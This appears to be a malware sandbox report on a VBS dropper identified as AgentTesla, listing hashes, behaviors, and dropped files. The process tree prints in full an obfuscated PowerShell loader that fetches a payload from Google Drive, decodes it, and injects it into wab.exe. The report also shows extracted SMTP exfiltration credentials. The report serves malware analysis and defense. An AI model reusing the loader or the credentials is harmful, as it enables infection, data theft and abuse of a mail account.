Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
10/05/2024, 08:47
Static task
static1
Behavioral task
behavioral1
Sample
9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs
Resource
win10v2004-20240508-en
General
-
Target
9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs
-
Size
10KB
-
MD5
420b31e03f0aac291050345120dbb1c8
-
SHA1
e0968e51e1f6d8f3335ef9b9d5dea2c3f2253079
-
SHA256
9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb
-
SHA512
b5d3d8a5fc03ffb54a166b30f4bcdb1073fbdc08df5013b170321199f1939de630f596d058f44a5c4d9bae8f7f3130a6cd3b1d5a11d7f1d9753aee926f0dd7ac
-
SSDEEP
192:LIOoWa+tZFy6AA+1WHfa1vD7nSruBun2mF:LmW7y6AASOE7nSr0uBF
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.blachownia.pl - Port:
587 - Username:
[email protected] - Password:
Zamowienia-2017 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2040 WScript.exe 8 2984 powershell.exe 10 2984 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\fMNDB = "C:\\Users\\Admin\\AppData\\Roaming\\fMNDB\\fMNDB.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 7 drive.google.com 8 drive.google.com 12 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2208 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1672 powershell.exe 2208 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1672 set thread context of 2208 1672 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2984 powershell.exe 1672 powershell.exe 1672 powershell.exe 2208 wab.exe 2208 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 2208 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2040 wrote to memory of 2984 2040 WScript.exe 29 PID 2040 wrote to memory of 2984 2040 WScript.exe 29 PID 2040 wrote to memory of 2984 2040 WScript.exe 29 PID 2984 wrote to memory of 2440 2984 powershell.exe 31 PID 2984 wrote to memory of 2440 2984 powershell.exe 31 PID 2984 wrote to memory of 2440 2984 powershell.exe 31 PID 2984 wrote to memory of 1672 2984 powershell.exe 32 PID 2984 wrote to memory of 1672 2984 powershell.exe 32 PID 2984 wrote to memory of 1672 2984 powershell.exe 32 PID 2984 wrote to memory of 1672 2984 powershell.exe 32 PID 1672 wrote to memory of 2668 1672 powershell.exe 33 PID 1672 wrote to memory of 2668 1672 powershell.exe 33 PID 1672 wrote to memory of 2668 1672 powershell.exe 33 PID 1672 wrote to memory of 2668 1672 powershell.exe 33 PID 1672 wrote to memory of 2208 1672 powershell.exe 34 PID 1672 wrote to memory of 2208 1672 powershell.exe 34 PID 1672 wrote to memory of 2208 1672 powershell.exe 34 PID 1672 wrote to memory of 2208 1672 powershell.exe 34 PID 1672 wrote to memory of 2208 1672 powershell.exe 34 PID 1672 wrote to memory of 2208 1672 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"3⤵PID:2440
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"4⤵PID:2668
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
454KB
MD5fc62b80e164b7026eac50c83ad55770e
SHA10cd849e2fa77e57d94ebe8c5b7685474e2438e48
SHA256473ff96f43544f04cb08a9e6faa4a72162ebd8e93363cb82cdd914f34eb38f1c
SHA512924b368df010aecca6d7efb572ab0a8d7a5afaacb3c12b94877f0606efe113184180fdf47067d00004f49297c3978054abc0980b51c04b8e145d9e276041c8de
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCXMZGY2388JJPZYGBAU.temp
Filesize7KB
MD56c46c14adf8b8d80199fa256656fc23f
SHA1d0a24dadd042739984c3ae8426d06e90dbf56157
SHA25686466c333d85fe3d3b6dc9fc2abd9fdcc3c401ed21ea28a0a7004dd4f4532006
SHA512cda2ed0925191945bbd79033605bcadc36197cff04e8356e20f6f69dcc803a0b3fcf3f303caefb29cb2e55cf73176edc19aeb34364a800826bbc4908234943b4